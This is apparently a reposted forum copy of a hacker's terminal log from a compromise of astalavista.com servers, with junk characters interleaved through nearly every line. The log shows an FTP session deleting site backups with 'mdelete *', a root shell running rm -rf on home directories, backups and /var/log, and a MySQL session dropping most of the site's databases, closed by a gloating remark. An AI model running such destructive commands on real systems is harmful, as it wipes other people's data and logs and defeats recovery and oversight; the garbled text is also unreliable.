dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com, t5 K9 L. N0 m& D4 y7 N
226 Transfer complete.
: v+ W' T7 M# I/ |ftp> cd astalavista.com
+ Z( t- g/ _6 { o* d8 O% B250 CWD command successful.
0 r& G% p5 u$ U" j" W: nftp> ls -la- z! |! l( c- x* G
227 Entering Passive Mode (212,254,194,163,2,189)
* F ^4 u% n: M( x& a/ j) b* a+ W150 Opening BINARY mode data connection for ‘file list’.
\4 O# h, R8 O3 ?2 I) q, ^-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar7 }" U& S- b4 L; D
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
9 C" e0 Y3 S W% n2 K-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2$ i" |5 J9 Y/ S( S' s
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
% Z- d; c1 A2 h5 K: H7 C2 @8 [8 [1 e7 s-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar2 L8 d: P. p `, e% r
[snip]9 R. v$ w g+ M9 g9 R" J
226 Transfer complete.
7 v, I3 d# _/ p; Y7 D, [ftp> mdelete *
0 s) O5 n( @1 i4 G7 y' aftp> ls -la
0 `, O4 }% S. c, X+ y227 Entering Passive Mode (212,254,194,163,2,193)! [8 A+ O) u: d/ K0 Z1 ~1 k
150 Opening BINARY mode data connection for ‘file list’.. N- |; d; i7 m
226 Transfer complete.4 ?! H. q8 L& O( G* l1 j9 o
ftp>" @! B, t h, ]- E# c
+ x W. v) j$ L+ P, Ash-3.2# cd /home; D3 d5 X; O0 P* y; @) e, R
sh-3.2# ls -la) Q3 N" J+ \& H& W
total 120* A/ F! b$ B. S) i1 L
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .+ Z; i, q# u b0 P2 `7 M; o
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
- j+ b6 Z( }" q0 Y, U* u9 Qdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
/ F' L% [* i* z' C( D$ L0 V5 e- g Q-rw——- 1 root root 8192 Jun 4 03:03 aquota.group9 u/ m ?& Y- j/ D6 Y8 q7 y
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user( j5 d! d+ h' C) t0 s) H
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
0 D& {. q4 Q7 t# s, c3 G) `! v$ a7 ndrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
' |6 N" S, r: G3 E6 F Jdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161: [! D" ^9 n( g5 a `! H
drwx–x–x 10 com com 4096 Apr 28 12:40 com
7 w* Z# A; {. a0 X; Z' @drwxr-xr-x 2 root root 4096 May 17 2007 ftp
2 _$ ? T- c P5 q. O7 e8 kdrwx—— 3 jon jon 4096 Sep 21 2007 jon5 e! E u6 t _* H/ B0 i
drwx—— 2 root root 16384 Sep 11 2007 lost+found( N0 s* E) W% O: \6 h3 w
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
7 Z4 {3 i5 ?; d; Y# \0 D* [drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata7 m$ Y+ p) I. j1 L. t/ j9 S
drwx—— 2 jon jon 4096 Sep 15 2007 test
4 P, E" y* q8 o" K* P8 y1 w3 Kdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
6 p4 {2 ?* c9 V: V6 U9 u F0 ^+ {+ ]- O/ G1 c9 y$ t1 c3 y
sh-3.2# rm -rf backup/# r1 Q' ^6 t, s# n3 I- C$ H
sh-3.2# rm -rf backup.14161/9 z% p1 H0 X4 J6 l* d: m
sh-3.2# rm -rf ftp/; ~2 k9 l; U b% B% M- @7 |
sh-3.2# rm -rf jon/
) @. H! U% W7 `; Msh-3.2# rm -rf my/' G5 [% c4 |2 t" h8 ]* ?
sh-3.2# rm -rf mysqldata/
! v# m0 P5 F6 u% L5 vsh-3.2# rm -rf test/' B7 p6 n5 S- j w# U
sh-3.2# rm -rf tmp/$ \8 u Y5 I/ S" P. t4 S9 e8 ]4 q' b
sh-3.2# cd ~
6 ?0 Q( t) b: L5 d2 n- J# wsh-3.2# rm -rf *. Y' Z' @' B. }! |2 l4 |* `
sh-3.2# rm -rf /var/log/
# r: U1 W, Q: X- a; g5 Brm: cannot remove directory `/var/log//proftpd’: Directory not empty% L! h6 U# |' d5 s
sh-3.2# rm -rf /home/*
+ A7 r: ~+ p3 k9 d' M9 bsh-3.2# mysql
; m7 P D; `% [: lWelcome to the MySQL monitor. Commands end with ; or \g.
1 i0 v& w- u. r, q2 ZYour MySQL connection id is 407156
4 i4 E# d) O `7 |5 sServer version: 5.0.45-community-log MySQL Community Edition (GPL)# c( R4 u1 u8 j: Q+ m: @
2 O; ?8 ?, p L, QType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
! n; \8 W+ C: d+ K/ b3 m/ ^ t/ f
' l) \$ k ^' m Z7 rmysql> show databases;
( c& z/ |: u- A$ a. W( _+———————–+5 O/ K$ c: B, d7 W. h
| Database |
7 k9 V: r3 N" a- C P2 Y/ t: I+———————–+
: I! T( o" c9 S9 M! g0 Y" u b% g| information_schema |
9 L( n# n# y3 t$ I8 ~& E& N$ ]6 [| astanet_ads |
. k1 P0 _& X* X0 E| astanet_mailing_lists |
" N* s1 c8 @4 R( g7 f# || astanet_mediawiki |" A/ B) e: G% w, S
| astanet_membersystem |
3 u( K( q5 s) b! z% N* P| com_contrexx |- w7 \" Y1 N, N. }
| com_contrexx2 |
* N, c& T4 t3 \& V7 ?| com_contrexx2_live |
+ f' O) m$ N6 ?, Z9 R0 `% o! Q| da_roundcube |
6 ]1 K. D( n0 c# P9 B5 T( s8 j/ l| dolphin |
3 X% Y$ q2 r: g. _| ideapool |6 v/ y3 q- J( `( ~
| mysql |
/ B S! ^ n. ]| test |3 {( G2 m# Y7 Y; r8 n
| yourmaster |
* F7 J, ^& Q! Z+———————–+
8 U! u' c4 I* B% B5 c9 v14 rows in set (0.03 sec); J& P/ L# _& `5 x8 d
8 x. b, e( m$ p
mysql> drop database astanet_membersystem;
/ c$ Y& k: \7 y8 y' JdroQuery OK, 46 rows affected (0.81 sec)
: S }1 R4 `# [7 V, j X) F- K I7 I7 e( q6 Z) \( n$ s
mysql> drop database com_contrexx;
/ p# ~- A# _# p2 B2 F$ |Query OK, 211 rows affected (2.72 sec)* ]$ x. e( p& C6 t- `. p
6 T3 E; \% _/ ~0 z- W, d4 z6 A
mysql> drop database com_contrexx2;" {: x! {; O4 v0 W+ k& _
Query OK, 237 rows affected (2.23 sec)
5 O: o& h) X: ~ ^" J1 ^6 h
. O: @7 F- f# V# c# [7 {9 Zmysql> drop database com_contrexx2_live;
E0 G% [: p7 d% _& ^9 sQuery OK, 227 rows affected (7.63 sec)4 j- D2 y* ~4 C; Y! ?; @
1 _& v1 i' y4 ?mysql> drop database ideapool;
7 y/ B. D+ G! a r- ^" A/ tQuery OK, 69 rows affected (0.19 sec)! _9 e+ r; M: v* `
" \: i( H+ ?" }6 _mysql> drop database yourmaster;3 Q8 Q+ U) V. U
Query OK, 158 rows affected (0.55 sec)3 E, u" h7 `* ^( ]1 r# Y0 t
j4 u$ q4 G6 E- w, o1 a; x
mysql> drop database astanet_ads;
. u* L9 p R) w& N( Y5 p% G" c" S0 jQuery OK, 9 rows affected (0.11 sec)
9 M# @1 {3 S$ q/ l; T. ]" o/ M
4 ~- g. }3 t e5 ^. U0 gmysql> drop database astanet_mailing_lists;
8 ~- ?' C4 [1 o- V3 ?: e( R# fQuery OK, 24 rows affected (1.47 sec)9 I- T7 S3 A6 Q9 g! x' G) k$ P
* L( |0 B$ [5 z7 B4 ?mysql> drop database astanet_mediawiki;6 o% u& ~4 f+ R+ x6 R, {6 W
Query OK, 31 rows affected (0.51 sec); l' H- ?2 l" {$ w0 r9 e7 \
8 i5 n- w0 j' j' |" f. S( V5 X' {mysql> show databases;$ w6 }" k- k+ p: e; H
+——————–+
) Q# q9 k6 t5 a' m6 w% t$ {| Database |
& t0 J) X% ?' ]/ X u+——————–+$ P0 u, a& Q+ g
| information_schema |+ V8 J( ?. ?; `4 H
| da_roundcube |) ~! `7 A8 f- x
| dolphin |
; S7 Z" e" p$ O% n8 M) ^ ~| mysql |' g' f% ]/ g9 k4 k2 |
| test |' q4 _9 ~7 o. ]
+——————–+
: U8 s: Z `- j( h! N/ a5 rows in set (0.00 sec)
$ a/ E+ l+ p( t/ O' j4 Q, F- }0 T7 u
% V: ^, R% |4 TWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
/ a7 u- y. Y/ P7 s* Vtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
' Q {; v8 O# p1 M/ T+ ywrong to say this pack of morons *wont be back*.5 [4 U) K Q: Y* B" k8 G
|
发表于 2012-11-6 21:07:34
收藏
支持
反对